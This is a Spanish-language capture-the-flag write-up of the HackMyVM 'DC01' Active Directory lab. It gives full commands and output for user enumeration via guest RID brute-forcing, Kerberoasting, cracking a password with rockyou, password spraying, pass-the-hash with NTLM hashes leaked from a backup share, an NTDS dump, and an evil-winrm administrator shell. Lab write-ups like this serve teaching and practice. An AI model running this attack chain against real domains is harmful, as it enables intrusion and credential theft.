DC01 – HackMyVM Link to heading

  • OS: Windows
  • Difficulty / Dificultad: Easy / Fácil
  • Platform / Plataforma: HackMyVM

‘HackMyVM’ Avatar


Resumen Link to heading

“DC01” es una máquina de dificultad fácil de la plafatorma HackMyVM la cual introduce algunos conceptos de Active Directory. Somos capaces de enumerar usuarios del dominio a través de una cuenta guest. Podemos entonces utilizar la herramienta GetUserSPNs de Impacket para obtener hashes para algunos usuarios e intentar crackearlos. Somos capaces de crackear el hash para un usuario y obtener su contraseña; obteniendo así acceso a recursos compartidos de respaldo. Estos recursos contienen hashes para algunos usuarios. Uno de estos hashes funciona para un usuario con privilegios máximo en el sistema, ganando así total control sobre éste.


User / Usuario Link to heading

Empezando con un escaneo con Nmap muestra múltiples puertos abiertos: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM); entre muchos otros:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.20.1.140

Aplicando algunos scripts de reconocimiento -sVC sobre estos puertos muestra:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.140

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 20:23 -03
Nmap scan report for 1.20.1.140
Host is up (0.00052s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-18 03:23:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:43:08:EC (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-18T03:24:23
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:43:08:ec (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m58s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.40 seconds

Estamos contra un entorno Active Directory.

Usando la herramienta NetExec contra el servicio SMB muestra:

❯ nxc smb 10.20.1.140

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

Tenemos un dominio: SOUPEDECODE.LOCAL.

Somos capaces de loguearnos en el servidor, a través de SMB, como el usuario guest:

❯ nxc smb 10.20.1.140 -u 'guest' -p ''

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:

No obstante, no hay ningún recurso compartido interesante (lo cual se puede ver usando la flag --shares):

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --shares

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             [*] Enumerated shares
SMB         1.20.1.140     445    DC01             Share           Permissions     Remark
SMB         1.20.1.140     445    DC01             -----           -----------     ------
SMB         1.20.1.140     445    DC01             ADMIN$                          Remote Admin
SMB         1.20.1.140     445    DC01             backup
SMB         1.20.1.140     445    DC01             C$                              Default share
SMB         1.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         1.20.1.140     445    DC01             NETLOGON                        Logon server share
SMB         1.20.1.140     445    DC01             SYSVOL                          Logon server share
SMB         1.20.1.140     445    DC01             Users

Hay un recurso llamado backup (respaldo), pero no tenemos permisos para leerlo como el usuario actual.

Usando la flag --rid-brute con NetExec para obtener usuarios nos devuelve algo:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         1.20.1.140     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         1.20.1.140     445    DC01             501: SOUPEDECODE\Guest (SidTypeUser)
SMB         1.20.1.140     445    DC01             502: SOUPEDECODE\krbtgt (SidTypeUser)
<SNIP>
SMB         1.20.1.140     445    DC01             2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB         1.20.1.140     445    DC01             2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2168: SOUPEDECODE\admin (SidTypeUser)

Tenemos múltiples usuarios.

Luego de aplicar algunos filtros con grep, podemos guardar todos los potenciales usuarios en una lista ejecutando:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute | awk '{print $6}' | grep 'SOUPEDECODE' | grep -vE 'Enterprise|Domain|Schema|Group|Read-only|Cloneable|Cert|Key|RAS|Protected|Allowed|Denied|DnsAdmins|DnsUpdateProxy|guest:' | awk -F '\' '{print $2}' > potential_users.txt

Dado que somos capaces de enumerar usuarios con NetExec como el usuario guest, y dado que tenemos potenciales usuarios, veré si podemos extraer los hashes de estos usuarios con la herramienta GetUserSPNs.py de Impacket:

❯ impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users.txt

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Obtenemos el error KRB_AP_ERR_SKEW.

Para evitar este error podemos correr sudo ntpdate -s 10.20.1.140 antes del comando para sincronizar relojes entre el servidor y nuestra máquina. Adicionalmente, dado que la lista es demasiado grande la “dividiré” en 2 usando el comando sed. Dado que el archivo de potenciales usuarios tiene 1069 líneas, podemos borrar las líneas 600 a la 1069 ejecutando:

❯ sed '600,1069d' potential_users.txt > potential_users_part1.txt

Y luego guardar la segunda mitad borrando las primeras 599 líneas usando sed de nuevo:

❯ sed '1,599d' potential_users.txt > potential_users_part2.txt

Luego, podemos solicitar los hashes corriendo el comando para ambas listas de usuarios (que es simplemente la original dividida en 2 para evitar problemas con el tiempo con Kerberos):

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part1.txt -outputfile hashes_found1

<SNIP>

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part2.txt -outputfile hashes_found2

Podemos “unir” ambas listas de hashes obtenidos usando cat:

❯ cat hashes_found2 >> hashes_found1

y, luego de aplicar algunos filtros, obtenemos hashes para algunos usuarios:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-'

$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$d1a00b576eedfa102b4650a56a55e0be9b90df0e3c3bb1d8565a5c38b3103d6a96fdf67d5afb98210b5789ce6ce137beea723d9fdee227e169e2720e8322d3f3b9c01828aae3d9184fd309bd6c08ff3479a9d4754a636d8bdb38729031ed50529b2cc1a6f8c0e9dc08b6cca2477bbead25a82425d7153fee9c46b92047aa1617b45c37fd4d40130663fc6363218f1f806a7a6ebcab0a0974bd6dc9e4ded6dd25abe2286aaec7dafda6e77981470138dac7c8e25d18d4c24578b0275c6039bd95a000bad7f4d01d92c385cfb5cf75d06afa36a0fa0a06de7b5bc2aba9d576de44482037f958dcf7643da5278a2a74900a39ec2629b8fab1e5301b8103f25ce2f0805a5b21fb99e49058219e97c5d32784253277bf978a61bc392e08c7fddab9d5004400bc264aa67aa446ba186f7d74c7e28872e881bf6b6dbd6671e973e588c3aef5ab8a2a54b51cf22f72fb2b787757aa975bc1f13c53c45ca6e72bd6d0f69a1c24ae445daef205bd676ad56f56a7598ad41024caefab2f274b6eaabf47680542bf0a8408c05fc7c08bcb6f06b413b598c053d5485f1443226486ccd4524a06f4550cd25ad869e6a03ea89a5823b577c91de6e43975c86898618a60cdd0270ca868deb92fcbcb6d26f0a081c8174c8a00181933eb86cce901f3103efe9de62639cab715729c935396ab8e51df592192aa24fc22843571ec8ed6e473a991f01bbba8503970675350ff4c8365a371894e3b35c025ecc1834d3e7f7d66e452478c265d79c1a037066089f157deb60e9929440249b0614ea6b72933c4c8213a870661a14cdfb08f4e6544d4c7393188cc030a7a8b920968e8a3ba70c99c97b607e8b90eb39454dc0b832866623b8b29e663c55aa307690117c5661fdf583955e734f43818f54070792a6cc7d4de9be7728c8fee3e40308bbc21e08b2a85fdacaf040e79f54f8118c726d5de2e0d800d2daaa69dd08bb1a558214f77cd901db13728921e9e22f46b9bd52682b4601439b0733e72b4ed637f45d5bd5413828d630a2d8380d021dc3863768db46be1122c1454f5f25542c0ed349c5d42269684aef0864012d31c29ea4ff8f4cd82f10fb6416f93f16a5f631153496077d044b5d8ecca61c37cecdcea245280adb5822ef5b366534311ffd11e37f47a973d555824d93ba04832d21de560ec16df8e2fb3e913703982154e81e1c4a57d8f54d6f7d47ad47fe3bf4f16e4a751d0c5f23377b558b33ce9b857c46ba6f8c426778f45dfa03a3ad5541451ee5418487af853f9e93e39f5edecbd29805edf74558eaee2fd6fccb9b89f0666a0500d4792effa68a24679295b656233a14633305be94146632eb53cc392ca161053d9c142d388c540d4c10a52768fe60900567656df96812eba72bef3c8bd92d40e138eff49544c7d07e93bc946e17610b39f90e30cb220c9e8b6188587b76906eb4c0b82dde0341127067a12da22ef5787247f0cf1805007577bbd14427327db97
$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$4e51f57152ccc7fb413a043a227bee411f211156cdce35fe261d3b223e384d447cf3219d03c906a0918232c968b024899212c90055f18d6d3c7edf7154e30845184b3a923c1a2aee0daaf97faeaa80c213c0ead533337ad09b35d19c19b17d99cc1b0a93d5f2c225bf0d055c0946700cf9c47d4c3337c8dbcf73824532c0f021d13d678c9eae1e91143087c7893c5a3b71f3a44398906c6f6852fb21286543bc912a5c0214bc62e7834205358790480b97c2938750d97b88ff663c3a295b5eb35e52b9a7d014573590699e6be20c83b42b2df3b09e79adeaecb526740d1d82cf4b053a9a399ed077849152be86be3d27466f3b5bdd228ab7932d84d182da906314fb22516fbcb650886280d7b2908cf70673c5d2c7508816a938f7fdde11a2146bc0282b36cddb9e736e5ed9b0cd3948d4ca89f3c83c686967e9399a0ebc23a9c111eb4e0fabf253cde5ac260d40f6d8ae2f14c40e3b21ef8010c54969e418d88e6a397b9c276bef9882ba92669583161ac9840a6d0bed1d2c4292a6960b7094da33baa08f26ccd8d3e8302a540fbd4301af7ede7e8c981571086559840512ff691b81b9c271caf5029200ce6e459df3e2a7ecb1aeffd9aec40613e2982d81cebedc94c55ae7df5592a3c6b79f732d47e6dc08e825885e9f9999dd258321a6369b56f148fbe2009f69874b06c40d2a3dea853d7cfadc63cd88da83598772126c0f852e95c1307a1987a6f950929625dae4777d10ae7d47a463d42d0b41557aa2314d27839bd6e64be7ff265a1375df00f26fcc10080bcbf862ab02de03b37e1d9271413c72f80e713a8b3ef57bbe72309d7f8c143e9467e5dbca69b9c1cf7f0f4e52aeed4be66b36534af835ee00d50e885290d0c4602eaecbd3cf6be43c8ec693968ca8fcd57a16faac6823ea2dd7bc32842fada434052835800c8f6a3cd7d8789fc499a50f206c2eff715fc3b481a77877911d18f06d97f392f8b65c3bdfb27bba4ff294aa6495d87ec7bcac4a58eeb401d5ef30a3fd86b5de3f18c6bd2693fbf7429fffb5b3383e3d3b505aaae7ff501ee2abf2d39bbd27285f197300eb6eb37d83e00a66ee46dae18ec30d295b2573302bb35b9f9d3be486d7dd11c200e5a7d96cdfcd801f60c335ae811266bbd13ef3986954f6f36053529161a560c52bc452f63ee849293a70cbef0053affff78b133055b352a918549fcea331bb57f69b8eac75f3ddc522702594ea83bd025f48be24b25cb6532794b169c70247d12fd3fef7166b2e9b2974d3a65e7f7b56977b94ec48e72b9e6f406a2e17869c69e3c1b75c80c7cc3b92d66ce1ac14aa3649cf2f6a7ee7849a87e988bbf8d8010fcda76a84b20495fe8df95766086695356bcaa90392fd2fc3a15923f0c6ed2bd5b458f6d119f1b6a14e56c0d915db35f31b4a9cdb375b99b4fce20c55e10d4377
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$53b4c659dac28bcd45263758813a4ac78a88190f35b5ea437e74aff3fe36fcdc8e916e30034214ff3fdbd5c92edf3eaeffec2e6337c585b72ae4d579a9c71da0142a04fe3747885a9f5316043030ca67e3c5788dcfa1ccb1cdd7eb345d2286676fee78588650aef8ec9fad25ab200e5ea850bafcf85e964513faddaa3fe5290cc2f96a2814b128e7a5455471dd95ad790a004f718fd551c2efa12e0fe38b1bdd626a08903ebba8cec1eaeb9dc3dfea1840a352875c0e8b0147f7df6f0d11fbec2d3de81c9b1a2784ee430bef5c034d37c603458f3806a44848351f4527983958afff11364f872039ac0c13d5fb9ed7c0284dbf5d53b557c2dd9c721dcdebf23a23a4115d6d76432a26ea0ffa38675375f6cda431fceaf5147109d9554c2217985e0411c5524a46417c6b03ecb3c041458d877bc6f2bbf5fb22007b0bce454d74ce181c21e376366fa4ade935ec36e11286538b9e15e4f383c15dce3bc251b336c04ae80e037d500cb4faebdec38249254011e6343a2fb87e55302a16d3b98b2e01b41f88628fe49e9b77ec55b6f62bd116e9061449400c7b5892da1af4d90c32b9c92e1104911c2f3425372729855cbdbb042b08da4843605bc2a8bf3ee95e3508e46a41c9777060c8d594bdcdc2abe37dbf05cae6128d7709c3b643c1f7432b3ae75e5d00bbc03216c9427851da6a66a8494f0c28bf82e19faaddef770aca0ffc0e2e6d89d6764089956c412a3d1707272b67557387dbdb71a5e8ddc0af6a7ddfe56e49f71b9c2bbc718ecf5a7bfdd7dd3e1074e49d6ad4962e19a0a1042cfb3ea35a335f1303d33191170e40d2132d0d3b2f50127a71ecb8ff06393f49799c950f074c94a74df665b58f194a61492520ba341507790087cd9d9402f4d72b30cd8da5024b4a88dc4ebe4e5d6b6f05d573aa3b1010ef27fe35ca739a8660053a88df878a76124a97bcc855672ae6b3ab943d79c694eb91f9137104886b734e3f77bb9bb8dabd2621c1c0a477d58717ea144a719cd7c66aacae4df9de35f0516d8f0141ed9c4cf6ff88c7345c47c180e7d662999371fce22745b5c3b9384bf2040672bcff4fb6ceb3cf32a8a26c7635e5568c727b8bc52089562cb8e8fab20ed2b4c98cd9afb46a693df24fe0eae7a500a34c97bdc9b8f73408fe50984a36ce072657aac8840287199fa4d1819dd6ee691106306d1a4418c72d5e8c26c3d476c74c8e3cdcffb11693c011c4d95ba57ffa6e1a8e594170719f142f65c15beb4ac9bf2f377de7c6cf36bba2b0593594323f18913d340bfba8070e72eef637d3dc861f63e4fa385df18a3f0240973d46b960aaabd18e4316955099884a83b67289c20385d78d0cb7933d2f3d486c0d0736f139e08e57831fdd0b43efe88abfc676583cab1a4b1f9566f1027a6d543d086d4d927bf632ad34d2dc5d924ed1abb26e
<SNIP>

Decido no considerar algunos hashes de usuarios con PC en sus nombres y crear una lista con ellos:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-' > filtered_hashes

y trato de crackear estos hashes a través de un Brute Force Password Cracking junto con el diccionario rockyou.txt y la herramienta JohnTheRipper:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt filtered_hashes

Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!!    (?)
1g 0:00:01:07 DONE (2024-10-17 21:40) 0.01480g/s 212311p/s 3131Kc/s 3131KC/s  0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Obtenemos una contraseña: Password123!!.

La contraseña es para uno de estos usuarios:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*'

krbtgt
DC01
file_svc
WebServer
DatabaseServer
FileServer
MailServer
BackupServer
ApplicationServer
PrintServer
ProxyServer
MonitoringServer
CitrixServer
firewall_svc
backup_svc
web_svc
monitoring_svc

De manera que las guardamos:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*' > potential_hash_user.txt

Y reviso para qué usuario corresponde la contraseña hallada con NetExec:

❯ nxc smb 10.20.1.140 -u potential_hash_user.txt -p 'Password123!!' --continue-on-success | grep -v 'Guest'

SMB                      10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\firewall_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\backup_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\web_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\monitoring_svc:Password123!! STATUS_LOGON_FAILURE

Tenemos una password para el usuario file_svc. Así, tenemos credenciales file_svc:Password123!!.


NT Authority/System - Administrador Link to heading

Este usuario no es capaz de loguearse en la máquina víctima a través de WinRM. Sin embargo, si revisamos qué recursos compartidos puede leer, podemos ver que este usuario puede leer el recurso compartido backup en SMB:

❯ nxc smb 10.20.1.140 -u 'file_svc' -p 'Password123!!' --shares --filter-shares READ

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB         10.20.1.140     445    DC01             [*] Enumerated shares
SMB         10.20.1.140     445    DC01             Share           Permissions     Remark
SMB         10.20.1.140     445    DC01             -----           -----------     ------
SMB         10.20.1.140     445    DC01             backup          READ
SMB         10.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         10.20.1.140     445    DC01             NETLOGON        READ            Logon server share
SMB         10.20.1.140     445    DC01             SYSVOL          READ            Logon server share

Podemos entonces usar la herramienta smbmap para ver el contenido de este recurso compartido:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' -r 'backup' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.20.1.140:445 Name: 10.20.1.140               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  READ ONLY
        ./backup
        dr--r--r--                0 Mon Jun 17 13:41:17 2024    .
        dw--w--w--                0 Mon Jun 17 13:44:56 2024    ..
        fr--r--r--              892 Mon Jun 17 13:41:23 2024    backup_extract.txt
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   NO ACCESS
[*] Closed 1 connections

Hay un archivo llamado backup_extract.txt.

Lo descargamos con smbmap y la flag --download:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' --download 'backup/backup_extract.txt' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: backup\backup_extract.txt (892 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/HackMyVM/DC01/content/10.20.1.140-backup_backup_extract.txt
[*] Closed 1 connections

Leyendo su contenido muestra una serie de hashes NTLM.

❯ cat 10.20.1.140-backup_backup_extract.txt

WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

Por tanto, dado que tenemos múltiples potenciales usuarios, podemos intentar una ataque Pass The Hash con estos hashes contra todos los potenciales usuarios dado que uno de estos podría funcionar. Guardamos estos hashes:

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}'

c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}' > leaked_hashes

Luego, usando de nuevo NetExec y los hashes encontrados, vemos si alguno de estos funciona con los usuarios que encontramos al principio:

❯ nxc smb 10.20.1.140 -u potential_users.txt -H leaked_hashes

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Guest:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
<SNIP>
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)

Uno de los hashes funciona para el usuario FileServer$. Adicionalmente, puedo ver el mensaje Pwn3d! a través del servicio SMB, lo cual signfiica que el usuario FileServer$ tiene privilegios máximos en la máquina víctima.

Por tanto, -y aunque este usuario ya es téxnicamente administrador- podemos usar NetExec para dumpear todos los hashes del sistema. En este caso simplemente dumpearé el hash del usuario Administrator:

❯ nxc smb 10.20.1.140 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --ntds --user Administrator

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
SMB         10.20.1.140     445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.20.1.140     445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
SMB         10.20.1.140     445    DC01             [+] Dumped 1 NTDS hashes to /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds of which 1 were added to the database
SMB         10.20.1.140     445    DC01             [*] To extract only enabled accounts from the output file, run the following command:
SMB         10.20.1.140     445    DC01             [*] cat /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | grep -iv disabled | cut -d ':' -f1
SMB         10.20.1.140     445    DC01             [*] grep -iv disabled /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | cut -d ':' -f1

Y uso este hash junto con evil-winrm para conectarme a la máquina víctima a través del servicio WinRM:

❯ evil-winrm -i 10.20.1.140 -u 'Administrator' -H '88d40c3a9a98889f5cbb778b0db54a2f'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

soupedecode\administrator

GG.

~Happy Hacking.